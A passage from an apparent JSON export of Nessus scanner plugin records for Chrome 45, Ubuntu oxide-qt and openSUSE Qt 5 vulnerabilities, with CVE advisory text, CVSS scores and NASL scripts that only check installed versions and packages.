cross-origin restrictions.\n (CVE-2015-1292)\n\n - An unspecified cross-origin bypass vulnerability exists\n that allows a remote attacker, via a specially crafted\n web page, to bypass cross-origin restrictions.\n (CVE-2015-1293)\n\n - A use-after-free error exists in the\n SkMatrix::invertNonIdentity() function in SkMatrix.cpp.\n A remote attacker can exploit this to dereference\n already freed memory, potentially resulting in the\n execution of arbitrary code. (CVE-2015-1294)\n\n - A use-after-free error exists in\n print_web_view_helper.cc that is triggered when handling\n nested IPC handlers. A remote attacker can exploit this\n to dereference already freed memory, potentially\n resulting in the execution of arbitrary code.\n (CVE-2015-1295)\n\n - A spoofing vulnerability exists due to a flaw that is\n triggered when displaying a URL containing certain\n characters in an omnibox. A remote attacker can exploit\n this to include characters that may look like a padlock,\n spoofing a secure connection. (CVE-2015-1296)\n\n - An unspecified flaw exists related to permission scoping\n as requests in an extension are not hidden from other\n extensions. (CVE-2015-1297)\n\n - An unspecified URL handling issue exists as the URL to\n be opened after an extension is uninstalled is not\n restricted to HTTP and HTTPS. (CVE-2015-1298)\n\n - A use-after-free error exists due to improper validation\n of user-supplied input. A remote attacker can exploit\n this to dereference already freed memory, potentially\n resulting in the execution of arbitrary code.\n (CVE-2015-1299)\n\n - An unspecified information disclosure vulnerability\n exists in Blink. (CVE-2015-1300)\n\n - Multiple unspecified flaws exist that allow an attacker\n to have unspecified medium severity impact.\n (CVE-2015-1301)", "edition": 26, "published": "2015-09-02T00:00:00", "title": "Google Chrome < 45.0.2454.85 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_45_0_2454_85.NASL", "href": "https://www.tenable.com/plugins/nessus/85743", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85743);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-1291\",\n \"CVE-2015-1292\",\n \"CVE-2015-1293\",\n \"CVE-2015-1294\",\n \"CVE-2015-1295\",\n \"CVE-2015-1296\",\n \"CVE-2015-1297\",\n \"CVE-2015-1298\",\n \"CVE-2015-1299\",\n \"CVE-2015-1300\",\n \"CVE-2015-1301\"\n );\n\n script_name(english:\"Google Chrome < 45.0.2454.85 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 45.0.2454.85. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in the ContainerNode::parserRemoveChild() function in \n ContainerNode.cpp wherein user scripts may unexpectedly\n run in 'onunload' handlers during Document Object Model\n (DOM) modification. A remote attacker can exploit this,\n via a specially crafted web page, to bypass cross-origin\n restrictions. (CVE-2015-1291)\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in the LocalDOMWindow::navigator() function in\n LocalDOMWindow.cpp wherein an incorrect navigator\n associated with a frame may be returned. A remote\n attacker can exploit this, via a specially crafted web\n page, to bypass cross-origin restrictions.\n (CVE-2015-1292)\n\n - An unspecified cross-origin bypass vulnerability exists\n that allows a remote attacker, via a specially crafted\n web page, to bypass cross-origin restrictions.\n (CVE-2015-1293)\n\n - A use-after-free error exists in the\n SkMatrix::invertNonIdentity() function in SkMatrix.cpp.\n A remote attacker can exploit this to dereference\n already freed memory, potentially resulting in the\n execution of arbitrary code. (CVE-2015-1294)\n\n - A use-after-free error exists in\n print_web_view_helper.cc that is triggered when handling\n nested IPC handlers. A remote attacker can exploit this\n to dereference already freed memory, potentially\n resulting in the execution of arbitrary code.\n (CVE-2015-1295)\n\n - A spoofing vulnerability exists due to a flaw that is\n triggered when displaying a URL containing certain\n characters in an omnibox. A remote attacker can exploit\n this to include characters that may look like a padlock,\n spoofing a secure connection. (CVE-2015-1296)\n\n - An unspecified flaw exists related to permission scoping\n as requests in an extension are not hidden from other\n extensions. (CVE-2015-1297)\n\n - An unspecified URL handling issue exists as the URL to\n be opened after an extension is uninstalled is not\n restricted to HTTP and HTTPS. (CVE-2015-1298)\n\n - A use-after-free error exists due to improper validation\n of user-supplied input. A remote attacker can exploit\n this to dereference already freed memory, potentially\n resulting in the execution of arbitrary code.\n (CVE-2015-1299)\n\n - An unspecified information disclosure vulnerability\n exists in Blink. (CVE-2015-1300)\n\n - Multiple unspecified flaws exist that allow an attacker\n to have unspecified medium severity impact.\n (CVE-2015-1301)\");\n # http://googlechromereleases.blogspot.com/2015/09/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?96b510c5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 45.0.2454.85 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1301\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'45.0.2454.85', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T03:46:39", "description": "The version of Google Chrome installed on the remote Mac OS X host is\nprior to 45.0.2454.85. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in the ContainerNode::parserRemoveChild() function in \n ContainerNode.cpp wherein user scripts may unexpectedly\n run in 'onunload' handlers during Document Object Model\n (DOM) modification. A remote attacker can exploit this,\n via a specially crafted web page, to bypass cross-origin\n restrictions. (CVE-2015-1291)\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in the LocalDOMWindow::navigator() function in\n LocalDOMWindow.cpp wherein an incorrect navigator\n associated with a frame may be returned. A remote\n attacker can exploit this, via a specially crafted web\n page, to bypass cross-origin restrictions.\n (CVE-2015-1292)\n\n - An unspecified cross-origin bypass vulnerability exists\n that allows a remote attacker, via a specially crafted\n web page, to bypass cross-origin restrictions.\n (CVE-2015-1293)\n\n - A use-after-free error exists in the\n SkMatrix::invertNonIdentity() function in SkMatrix.cpp.\n A remote attacker can exploit this to dereference\n already freed memory, potentially resulting in the\n execution of arbitrary code. (CVE-2015-1294)\n\n - A use-after-free error exists in\n print_web_view_helper.cc that is triggered when handling\n nested IPC handlers. A remote attacker can exploit this\n to dereference already freed memory, potentially\n resulting in the execution of arbitrary code.\n (CVE-2015-1295)\n\n - A spoofing vulnerability exists due to a flaw that is\n triggered when displaying a URL containing certain\n characters in an omnibox. A remote attacker can exploit\n this to include characters that may look like a padlock,\n spoofing a secure connection. (CVE-2015-1296)\n\n - An unspecified flaw exists related to permission scoping\n as requests in an extension are not hidden from other\n extensions. (CVE-2015-1297)\n\n - An unspecified URL handling issue exists as the URL to\n be opened after an extension is uninstalled is not\n restricted to HTTP and HTTPS. (CVE-2015-1298)\n\n - A use-after-free error exists due to improper validation\n of user-supplied input. A remote attacker can exploit\n this to dereference already freed memory, potentially\n resulting in the execution of arbitrary code.\n (CVE-2015-1299)\n\n - An unspecified information disclosure vulnerability\n exists in Blink. (CVE-2015-1300)\n\n - Multiple unspecified flaws exist that allow an attacker\n to have unspecified medium severity impact.\n (CVE-2015-1301)", "edition": 26, "published": "2015-09-02T00:00:00", "title": "Google Chrome < 45.0.2454.85 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_45_0_2454_85.NASL", "href": "https://www.tenable.com/plugins/nessus/85744", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85744);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-1291\",\n \"CVE-2015-1292\",\n \"CVE-2015-1293\",\n \"CVE-2015-1294\",\n \"CVE-2015-1295\",\n \"CVE-2015-1296\",\n \"CVE-2015-1297\",\n \"CVE-2015-1298\",\n \"CVE-2015-1299\",\n \"CVE-2015-1300\",\n \"CVE-2015-1301\"\n );\n\n script_name(english:\"Google Chrome < 45.0.2454.85 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 45.0.2454.85. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in the ContainerNode::parserRemoveChild() function in \n ContainerNode.cpp wherein user scripts may unexpectedly\n run in 'onunload' handlers during Document Object Model\n (DOM) modification. A remote attacker can exploit this,\n via a specially crafted web page, to bypass cross-origin\n restrictions. (CVE-2015-1291)\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in the LocalDOMWindow::navigator() function in\n LocalDOMWindow.cpp wherein an incorrect navigator\n associated with a frame may be returned. A remote\n attacker can exploit this, via a specially crafted web\n page, to bypass cross-origin restrictions.\n (CVE-2015-1292)\n\n - An unspecified cross-origin bypass vulnerability exists\n that allows a remote attacker, via a specially crafted\n web page, to bypass cross-origin restrictions.\n (CVE-2015-1293)\n\n - A use-after-free error exists in the\n SkMatrix::invertNonIdentity() function in SkMatrix.cpp.\n A remote attacker can exploit this to dereference\n already freed memory, potentially resulting in the\n execution of arbitrary code. (CVE-2015-1294)\n\n - A use-after-free error exists in\n print_web_view_helper.cc that is triggered when handling\n nested IPC handlers. A remote attacker can exploit this\n to dereference already freed memory, potentially\n resulting in the execution of arbitrary code.\n (CVE-2015-1295)\n\n - A spoofing vulnerability exists due to a flaw that is\n triggered when displaying a URL containing certain\n characters in an omnibox. A remote attacker can exploit\n this to include characters that may look like a padlock,\n spoofing a secure connection. (CVE-2015-1296)\n\n - An unspecified flaw exists related to permission scoping\n as requests in an extension are not hidden from other\n extensions. (CVE-2015-1297)\n\n - An unspecified URL handling issue exists as the URL to\n be opened after an extension is uninstalled is not\n restricted to HTTP and HTTPS. (CVE-2015-1298)\n\n - A use-after-free error exists due to improper validation\n of user-supplied input. A remote attacker can exploit\n this to dereference already freed memory, potentially\n resulting in the execution of arbitrary code.\n (CVE-2015-1299)\n\n - An unspecified information disclosure vulnerability\n exists in Blink. (CVE-2015-1300)\n\n - Multiple unspecified flaws exist that allow an attacker\n to have unspecified medium severity impact.\n (CVE-2015-1301)\");\n # http://googlechromereleases.blogspot.com/2015/09/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?96b510c5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 45.0.2454.85 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1301\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'45.0.2454.85', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:29:03", "description": "It was discovered that the DOM tree could be corrupted during parsing\nin some circumstances. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit this\nto bypass same-origin restrictions or cause a denial of service.\n(CVE-2015-1291)\n\nAn issue was discovered in NavigatorServiceWorker::serviceWorker in\nBlink. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to bypass\nsame-origin restrictions. (CVE-2015-1292)\n\nAn issue was discovered in the DOM implementation in Blink. If a user\nwere tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to bypass same-origin restrictions.\n(CVE-2015-1293)\n\nA use-after-free was discovered in Skia. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer crash, or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2015-1294)\n\nA use-after-free was discovered in the shared-timer implementation in\nBlink. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service via renderer crash, or execute arbitrary code with the\nprivileges of the sandboxed render process. (CVE-2015-1299)\n\nIt was discovered that the availability of iframe Resource Timing API\ntimes was not properly restricted in some circumstances. If a user\nwere tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to obtain sensitive information.\n(CVE-2015-1300)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1301)\n\nA heap corruption issue was discovered in\noxide::JavaScriptDialogManager. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit this\nto cause a denial of service via application crash, or execute\narbitrary code with the privileges of the user invoking the program.\n(CVE-2015-1332).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2015-09-09T00:00:00", "title": "Ubuntu 14.04 LTS / 15.04 : oxide-qt vulnerabilities (USN-2735-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1332", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "modified": "2015-09-09T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:15.04", "p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2735-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85872", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2735-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85872);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\", \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1301\", \"CVE-2015-1332\");\n script_xref(name:\"USN\", value:\"2735-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 15.04 : oxide-qt vulnerabilities (USN-2735-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the DOM tree could be corrupted during parsing\nin some circumstances. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit this\nto bypass same-origin restrictions or cause a denial of service.\n(CVE-2015-1291)\n\nAn issue was discovered in NavigatorServiceWorker::serviceWorker in\nBlink. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to bypass\nsame-origin restrictions. (CVE-2015-1292)\n\nAn issue was discovered in the DOM implementation in Blink. If a user\nwere tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to bypass same-origin restrictions.\n(CVE-2015-1293)\n\nA use-after-free was discovered in Skia. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer crash, or\nexecute arbitrary code with the privileges of the sandboxed render\nprocess. (CVE-2015-1294)\n\nA use-after-free was discovered in the shared-timer implementation in\nBlink. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service via renderer crash, or execute arbitrary code with the\nprivileges of the sandboxed render process. (CVE-2015-1299)\n\nIt was discovered that the availability of iframe Resource Timing API\ntimes was not properly restricted in some circumstances. If a user\nwere tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to obtain sensitive information.\n(CVE-2015-1300)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1301)\n\nA heap corruption issue was discovered in\noxide::JavaScriptDialogManager. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit this\nto cause a denial of service via application crash, or execute\narbitrary code with the privileges of the user invoking the program.\n(CVE-2015-1332).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2735-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected liboxideqtcore0 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.9.1-0ubuntu0.14.04.2\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.9.1-0ubuntu0.15.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:29:03", "description": "Qt 5 was updated to the 5.5.1 release to deliver upstream improvements\nand fixes to Qt functionality.\n\nThe following Security fixes are contained in QtWebEngineCore :\n\n - ICU: CVE-2014-8146, CVE-2014-8147\n\n - Blink: CVE-2015-1284, CVE-2015-1291, CVE-2015-1292\n\n - Skia: CVE-2015-1294\n\n - V8: CVE-2015-1290\n\nThe following packages were rebuilt because they use private headers :\n\n - calibre\n\n - fcitx-qt5\n\n - frameworkintegration\n\n - kwayland\n\n - kwin5,\n\n - lxqt-powermanagement\n\n - lxqt-qtplugin", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2015-12-29T00:00:00", "title": "openSUSE Security Update : Qt 5 (openSUSE-2015-953)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1291", "CVE-2014-8147", "CVE-2015-1294", "CVE-2014-8146", "CVE-2015-1292", "CVE-2015-1284", "CVE-2015-1290"], "modified": "2015-12-29T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libqt5-qtct-debugsource", "p-cpe:/a:novell:opensuse:libQt53DRenderer5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Core5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:frameworkintegration-devel", "p-cpe:/a:novell:opensuse:libqt5-qtx11extras-devel", "p-cpe:/a:novell:opensuse:kwayland-devel", "p-cpe:/a:novell:opensuse:libqt5-qtlocation-devel", "p-cpe:/a:novell:opensuse:libQt5WebChannel5", "p-cpe:/a:novell:opensuse:libQt53DInput-devel", "p-cpe:/a:novell:opensuse:kwin5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Network-private-headers-devel", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-tools-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Positioning5", "p-cpe:/a:novell:opensuse:libQt5Multimedia5", "p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-examples", "p-cpe:/a:novell:opensuse:libQt5WebChannel5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtserialport-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5Designer5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtlocation-private-headers-devel", "p-cpe:/a:novell:opensuse:kwayland-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5Bluetooth5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5WebSockets5-imports", "p-cpe:/a:novell:opensuse:lxqt-qtplugin-debugsource", "p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-devel", "p-cpe:/a:novell:opensuse:libqt5-qtsensors-examples-debuginfo", "p-cpe:/a:novell:opensuse:libQt5WebKit5-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Script5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Declarative5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt53DCore5-32bit", "p-cpe:/a:novell:opensuse:libqt5-creator-debugsource", "p-cpe:/a:novell:opensuse:libQt5Compositor5", "p-cpe:/a:novell:opensuse:libqt5-qtbase-devel", "p-cpe:/a:novell:opensuse:libQt5Sensors5", "p-cpe:/a:novell:opensuse:libQt5Svg5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtbase-examples-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtwayland-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-devel-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Sql5-postgresql-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Widgets-private-headers-devel", "p-cpe:/a:novell:opensuse:libqt5-qtquick1-private-headers-devel", "p-cpe:/a:novell:opensuse:libQt5WebKitWidgets5-32bit", "p-cpe:/a:novell:opensuse:libQt53DQuickRenderer5-debuginfo", "p-cpe:/a:novell:opensuse:lxqt-qtplugin", "p-cpe:/a:novell:opensuse:libQt5Sql5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:libQt5PrintSupport5", "p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-devel", "p-cpe:/a:novell:opensuse:frameworkintegration-plugin-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols-examples-debuginfo", "p-cpe:/a:novell:opensuse:libQt5Sql5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Sensors5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5PlatformSupport-devel-static", "p-cpe:/a:novell:opensuse:libqt5-qt3d-examples", "p-cpe:/a:novell:opensuse:libQt5Help5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Sensors5-imports", "p-cpe:/a:novell:opensuse:libQt5Network5", "p-cpe:/a:novell:opensuse:libQt5Sql5-sqlite", "p-cpe:/a:novell:opensuse:libQt5Multimedia5-32bit", "p-cpe:/a:novell:opensuse:libQt5Sql-devel", "p-cpe:/a:novell:opensuse:libQt5Bluetooth5", "p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-devel", "p-cpe:/a:novell:opensuse:libQt5Designer5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5WebKit5-32bit", "p-cpe:/a:novell:opensuse:libqt5-qtwayland-examples", "p-cpe:/a:novell:opensuse:libQt5WebKitWidgets5", "p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-devel", "p-cpe:/a:novell:opensuse:libQt5Compositor5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libQt5Sql5", "p-cpe:/a:novell:opensuse:libQt5Location5", "p-cpe:/a:novell:opensuse:libQt5OpenGLExtensions-devel-static-32bit", "p-cpe:/a:novell:opensuse:libQt5Core5", "p-cpe:/a:novell:opensuse:libqt5-qtsvg-debugsource", "p-cpe:/a:novell:opensuse:libQt5DesignerComponents5", "p-cpe:/a:novell:opensuse:libQt5WebKitWidgets5-debuginfo", "p-cpe:/a:novell:opensuse:libqt5-qtserialport-devel-32bit", "p-cpe:/a:novell:opensuse:libQt5Sql5-mysql", "p-cpe:/a:novell:opensuse:fcitx-qt5-devel", "p-cpe:/a:novell:opensuse:libqt5-qtwebengine-examples", 